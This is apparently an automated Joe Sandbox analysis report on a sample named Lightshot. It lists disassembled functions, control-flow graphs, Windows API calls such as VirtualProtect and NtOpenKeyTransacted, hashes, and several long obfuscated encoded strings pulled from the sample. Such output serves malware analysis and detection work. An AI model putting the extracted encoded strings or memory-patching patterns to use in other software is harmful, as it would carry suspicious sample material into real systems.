                                                                          • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction Fuzzy Hash: EA413071A1960689E700BB1DE59C379A391AF67789FE45031CB0D43BAEDFACA441C330
                                                                          Function 00007FF7B1C81394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtOpenKeyTransacted.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1C81156), ref: 00007FF7B1C813F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: OpenTransacted
                                                                          • String ID:
                                                                          • API String ID: 1720269262-0
                                                                          • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction ID: f8fe3cc99da106a6e6dcc5344837f804fc241000b837bb771f6b178bfa1eebfe
                                                                          • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction Fuzzy Hash: B7F0C971908B4182D710EB59F88D03AB760FBAA388B605C35EA8D47B29CF7CE051DB60

                                                                          Non-executed Functions

                                                                          Function 00007FF7B1C865EC Relevance: 27.5, APIs: 12, Strings: 6, Instructions: 489COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 42 7ff7b1c865ec-7ff7b1c865f3 43 7ff7b1c865f9-7ff7b1c866df 42->43 44 7ff7b1c866e6-7ff7b1c86784 wcslen call 7ff7b1c8153f call 7ff7b1c8145e 42->44 43->44 49 7ff7b1c8680e-7ff7b1c86822 44->49 50 7ff7b1c8678a-7ff7b1c86791 44->50 53 7ff7b1c8686b-7ff7b1c8688d wcslen 49->53 54 7ff7b1c86824-7ff7b1c86864 49->54 50->49 52 7ff7b1c86793-7ff7b1c86804 call 7ff7b1c82f70 call 7ff7b1c839b0 call 7ff7b1c814c7 50->52 52->49 67 7ff7b1c86806-7ff7b1c86809 call 7ff7b1c8145e 52->67 58 7ff7b1c86890-7ff7b1c868a0 53->58 54->53 64 7ff7b1c869ac 58->64 65 7ff7b1c868a6-7ff7b1c868ba wcslen 58->65 66 7ff7b1c869b0-7ff7b1c869c4 64->66 65->58 68 7ff7b1c868bc 65->68 71 7ff7b1c86a29-7ff7b1c86ae1 wcscpy wcscat call 7ff7b1c82f70 call 7ff7b1c83350 call 7ff7b1c814c7 66->71 72 7ff7b1c869c6-7ff7b1c86a22 66->72 67->49 68->66 81 7ff7b1c86ae7-7ff7b1c86aee 71->81 82 7ff7b1c87ec4-7ff7b1c87f06 call 7ff7b1c81370 71->82 72->71 84 7ff7b1c86b37-7ff7b1c86b47 wcslen 81->84 85 7ff7b1c86af0-7ff7b1c86b30 81->85 82->85 91 7ff7b1c87f0c 82->91 86 7ff7b1c86b89-7ff7b1c86b8b 84->86 87 7ff7b1c86b49-7ff7b1c86b55 84->87 85->84 90 7ff7b1c86b91-7ff7b1c86bbb wcscat 86->90 89 7ff7b1c86b60-7ff7b1c86b70 87->89 94 7ff7b1c86b8d 89->94 95 7ff7b1c86b72-7ff7b1c86b85 wcslen 89->95 96 7ff7b1c87f11-7ff7b1c87f53 call 7ff7b1c81370 90->96 97 7ff7b1c86bc1-7ff7b1c86bc8 90->97 91->84 94->90 95->89 99 7ff7b1c86b87 95->99 100 7ff7b1c86bca-7ff7b1c86c0a 96->100 107 7ff7b1c87f59 96->107 97->100 101 7ff7b1c86c11-7ff7b1c86c40 wcscpy wcscat 97->101 99->90 100->101 103 7ff7b1c87f5e-7ff7b1c87f84 call 7ff7b1c89840 call 7ff7b1c81370 101->103 104 7ff7b1c86c46-7ff7b1c86c4d 101->104 106 7ff7b1c86c53-7ff7b1c86cfd 103->106 122 7ff7b1c87f8a 103->122 105 7ff7b1c86d04-7ff7b1c86d0b 104->105 104->106 109 7ff7b1c86d11-7ff7b1c86d18 105->109 110 7ff7b1c87f8f-7ff7b1c87fd3 call 7ff7b1c81370 105->110 106->105 107->101 112 7ff7b1c86d1a-7ff7b1c86d6f 109->112 113 7ff7b1c86d76-7ff7b1c86d7d 109->113 110->112 123 7ff7b1c87fd9 110->123 112->113 116 7ff7b1c87fde-7ff7b1c88018 memcpy call 7ff7b1c81370 113->116 117 7ff7b1c86d83-7ff7b1c86d8a 113->117 121 7ff7b1c86d90-7ff7b1c86dac 116->121 128 7ff7b1c8801e 116->128 120 7ff7b1c86eed-7ff7b1c86f8b wcslen call 7ff7b1c8153f call 7ff7b1c8145e 117->120 117->121 133 7ff7b1c87021-7ff7b1c87049 call 7ff7b1c8145e 120->133 134 7ff7b1c86f91-7ff7b1c86f98 120->134 125 7ff7b1c86db0-7ff7b1c86e08 121->125 122->105 123->113 125->125 129 7ff7b1c86e0a-7ff7b1c86ee6 125->129 128->120 129->120 134->133 136 7ff7b1c86f9e-7ff7b1c87017 call 7ff7b1c82f70 call 7ff7b1c839b0 call 7ff7b1c814c7 134->136 136->133 144 7ff7b1c87019-7ff7b1c8701c call 7ff7b1c8145e 136->144 144->133
                                                                          APIs
                                                                          Strings
                                                                          • JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr, xrefs: 00007FF7B1C86793
                                                                          • 6, xrefs: 00007FF7B1C86A3B
                                                                          • 0, xrefs: 00007FF7B1C86F39
                                                                          • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9, xrefs: 00007FF7B1C86F9E
                                                                          • JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET, xrefs: 00007FF7B1C86A65
                                                                          • X&, xrefs: 00007FF7B1C86FAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$JTYTcnV1a2NsdGl6Ym54d2J2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0E3lvYwAe0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDUGNvODxrdA//aGO/a+sVdHVrY2h0aXqSblp3aXRtYW0mY29oZ2t0a3lvYyh9a3J0ZWtjaHRpOmNueHdiZmNhbXZjb255a3RreW9jbmxr$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0Q3hvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NVHJArDWT+aRFl/HAbf+19UB/1ah1l9mVaEPt/w2j6aVoF+nkbZP5pBBoBcB9/7X0OGPJqB2X2ZQQX+397aPppBAL9$JTb7cnd1a2NsdGl6nZF4d9p2Y2FtdGNvKHlrdGt5b2NobGtydHVrY2h0aXpibnh3YnZjYW10Y29oeWt0i3lvY2Zz0Xx0wWKuScxoNq9PLB8LBUMRHxsEHQkUSxcKFwEMHEwJF1QHHg1IHQdaJiErVw8ZBwRDeW5lTHlrdGt5b2NdVgWOBS5rzBkvadUTNXjYEy1izhAvY8A+5BDbHyJvzD7xFt0ELmvMPukE1RA1eNg06xLOHS9jwD7kF9sbIm/MPvET$X&$ 6
                                                                          • API String ID: 4088430540-3141501615
                                                                          • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction ID: d9da619ba95e6320c848a902134fbc7de77a4d1117bb57215101d81e7252d4cd
                                                                          • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction Fuzzy Hash: 4E528321D2DB8288F711AF2DA8497F4E350AFB338DF944235DB8C569A9DFAC6145C324
                                                                          Function 00007FF7B1C811D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 3825114775-1582277970
                                                                          • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction ID: 680508bad1af1f73dde6bdbc8d0e1d703faa2fb5da1cee5c6160ddcbe0b365bf
                                                                          • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction Fuzzy Hash: 15411D7191960288E700BB1DE59C379A391AF66B9DFA45031CB4E43BAEDFECA441C331
                                                                          Function 00007FF7B1C82690 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 597572034-2527496196
                                                                          • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction ID: aeb3a7da64d14ea25d19d8616db3b5d1b3000977be212d482ad6fb5b0b697ddc
                                                                          • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                          • Instruction Fuzzy Hash: BB02C222908BC185E3209F19E4487BAB7A0FBA6798F904235DB9C07BE9DFBCD145C750
                                                                          Function 00007FF7B1C83352 Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 205COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 3623275624-1413854666
                                                                          • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction ID: 48e69d432e52367dc9ddbdde24ab75bc0823163e869c638d24dca096c3c638c1
                                                                          • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                          • Instruction Fuzzy Hash: 59B1B12180C6C185E321AB1CE4497FAB7A0FFA234CF905135EB8D56AA9DFBCD145CB60
                                                                          Function 00007FF7B1C81BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81CC7
                                                                          • memcpy.MSVCRT ref: 00007FF7B1C81CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF7B1C8C8F4,00007FF7B1C8C8F4,?,?,00007FF7B1C80000,?,00007FF7B1C81991), ref: 00007FF7B1C81D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction ID: 7485e01ffd752addd7a8cbb5f1879832beba28d41fe2b46b2094344248b4ca42
                                                                          • Opcode Fuzzy Hash: ddbdcf1874e9ea71757a48b7d804bab9f2fa45dded7038c380b0ba63e0422925
                                                                          • Instruction Fuzzy Hash: 9C41B771A0854289EB11AB19D48C7B9A790EB67B89FA44132CF0D43BA9DE7CE445C321
                                                                          Function 00007FF7B1C82104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction ID: fdcef9700e00b62deca65141e8d89cbc6b3fcccbce39132006215d6356cb8686
                                                                          • Opcode Fuzzy Hash: 613fdf5728c7ed6876bd790cebaa614c9071348df8fdca610d58b176e96f82e5
                                                                          • Instruction Fuzzy Hash: 1621F124A1950285FB15BB59E58C375D2607F23B99FE40131CF0D47AACCFACA846C360
                                                                          Function 00007FF7B1C81E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 316 7ff7b1c81e10-7ff7b1c81e2d 317 7ff7b1c81e3e-7ff7b1c81e48 316->317 318 7ff7b1c81e2f-7ff7b1c81e38 316->318 320 7ff7b1c81e4a-7ff7b1c81e53 317->320 321 7ff7b1c81ea3-7ff7b1c81ea8 317->321 318->317 319 7ff7b1c81f60-7ff7b1c81f69 318->319 322 7ff7b1c81ecc-7ff7b1c81ed1 320->322 323 7ff7b1c81e55-7ff7b1c81e60 320->323 321->319 324 7ff7b1c81eae-7ff7b1c81eb3 321->324 325 7ff7b1c81f23-7ff7b1c81f2d 322->325 326 7ff7b1c81ed3-7ff7b1c81ee2 signal 322->326 323->321 327 7ff7b1c81efb-7ff7b1c81f0a call 7ff7b1c89ff0 324->327 328 7ff7b1c81eb5-7ff7b1c81eba 324->328 332 7ff7b1c81f43-7ff7b1c81f45 325->332 333 7ff7b1c81f2f-7ff7b1c81f3f 325->333 326->325 330 7ff7b1c81ee4-7ff7b1c81ee8 326->330 327->325 337 7ff7b1c81f0c-7ff7b1c81f10 327->337 328->319 329 7ff7b1c81ec0 328->329 329->325 334 7ff7b1c81f4e-7ff7b1c81f53 330->334 335 7ff7b1c81eea-7ff7b1c81ef9 signal 330->335 332->319 333->332 338 7ff7b1c81f5a 334->338 335->319 339 7ff7b1c81f55 337->339 340 7ff7b1c81f12-7ff7b1c81f21 signal 337->340 338->319 339->338 340->319
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction ID: 5e10815bddc534762b21a854ac22026a488710e5610a08ab19adf349fc03ea7b
                                                                          • Opcode Fuzzy Hash: 8ffd1e83da114adb7a12425d872c4067a8ab9974e88a3fba3c75f53be1714557
                                                                          • Instruction Fuzzy Hash: 90218D31E0910689FB64621C95CC37D91C19FBA76CFB99135DB0E43ADCCEACACC28261
                                                                          Function 00007FF7B1C838E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$@
                                                                          • API String ID: 4088430540-1545510068
                                                                          • Opcode ID: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction ID: 1aa0f3e51e3d73ab1fb34f30c3b1c63b7db4aed84da8662bf8c02f611b20a812
                                                                          • Opcode Fuzzy Hash: 8bc87b3cca2c78adc28c7b1354bc797d6113aeb12ee74f16880f0486ba838264
                                                                          • Instruction Fuzzy Hash: E3114D2252868186E3509B18F4897AAA3B4EFE5394F545124F78982A68EF7DC145CB10
                                                                          Function 00007FF7B1C81880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 349 7ff7b1c81880-7ff7b1c8189c 350 7ff7b1c818a2-7ff7b1c818f9 call 7ff7b1c82420 call 7ff7b1c82660 349->350 351 7ff7b1c81a0f-7ff7b1c81a1f 349->351 350->351 356 7ff7b1c818ff-7ff7b1c81910 350->356 357 7ff7b1c8193e-7ff7b1c81941 356->357 358 7ff7b1c81912-7ff7b1c8191c 356->358 360 7ff7b1c8194d-7ff7b1c81954 357->360 361 7ff7b1c81943-7ff7b1c81947 357->361 359 7ff7b1c8191e-7ff7b1c81929 358->359 358->360 359->360 362 7ff7b1c8192b-7ff7b1c8193a 359->362 364 7ff7b1c8199e-7ff7b1c819a6 360->364 365 7ff7b1c81956-7ff7b1c81961 360->365 361->360 363 7ff7b1c81a20-7ff7b1c81a26 361->363 362->357 367 7ff7b1c81a2c-7ff7b1c81a37 363->367 368 7ff7b1c81b87-7ff7b1c81b98 call 7ff7b1c81d40 363->368 364->351 366 7ff7b1c819a8-7ff7b1c819c1 364->366 369 7ff7b1c81970-7ff7b1c8199c call 7ff7b1c81ba0 365->369 370 7ff7b1c819df-7ff7b1c819e7 366->370 367->364 372 7ff7b1c81a3d-7ff7b1c81a5f 367->372 369->364 375 7ff7b1c819e9-7ff7b1c81a0d VirtualProtect 370->375 376 7ff7b1c819d0-7ff7b1c819dd 370->376 377 7ff7b1c81a7d-7ff7b1c81a97 372->377 375->376 381 7ff7b1c81a70-7ff7b1c81a77 375->381 376->351 376->370 379 7ff7b1c81a9d-7ff7b1c81afa 377->379 380 7ff7b1c81b74-7ff7b1c81b82 call 7ff7b1c81d40 377->380 386 7ff7b1c81afc-7ff7b1c81b0e 379->386 387 7ff7b1c81b22-7ff7b1c81b26 379->387 380->368 381->364 381->377 388 7ff7b1c81b5c-7ff7b1c81b6f call 7ff7b1c81d40 386->388 389 7ff7b1c81b10-7ff7b1c81b20 386->389 387->381 390 7ff7b1c81b2c-7ff7b1c81b30 387->390 388->380 389->387 389->388 390->381 392 7ff7b1c81b36-7ff7b1c81b57 call 7ff7b1c81ba0 390->392 392->388
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1C81247), ref: 00007FF7B1C819F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction ID: 1cc0ef22fa027c90a0ca83711941225010775bf4185f6db7a66db1bf1e558592
                                                                          • Opcode Fuzzy Hash: f047dfd43f2b20f4878765ae852215213f87511333d9653e63cf908346f9a17d
                                                                          • Instruction Fuzzy Hash: D3517821F04546DAEB10AB29D48D7B8A7A1BB26B5DFA45131DB1C07B9DCFBCE482C710
                                                                          Function 00007FF7B1C81800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
